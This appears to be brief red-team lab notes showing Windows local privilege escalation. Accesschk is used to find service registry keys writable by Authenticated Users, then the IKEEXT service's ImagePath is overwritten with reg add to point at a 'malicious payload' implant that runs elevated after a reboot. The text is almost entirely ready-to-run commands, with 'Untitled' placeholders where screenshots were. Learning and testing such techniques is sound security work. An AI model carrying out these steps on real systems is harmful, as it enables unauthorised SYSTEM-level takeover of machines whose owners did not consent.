First: query all registries

accesschk.exe -accepteula -wuvskq "HKLM\System\CurrentControlSet\Services" > c:\rto\regs.txt

Untitled

Second: Open the file and search for the Word Authenticated

notepad c:\rto\regs.txt

Untitled

Notice that the Authenticated Users have all access to the IKEEXT Registry

Third: Let’s query that registry for interesting parameter

reg query HKLM\System\CurrentControlSet\Services\IKEEXT

Untitled

Fourth: change the Image Path to point to our malicious payload

reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d C:\rto\lpe\implant\implantsrv.exe /f

Untitled

Now once the machine is rebooted we will be elevated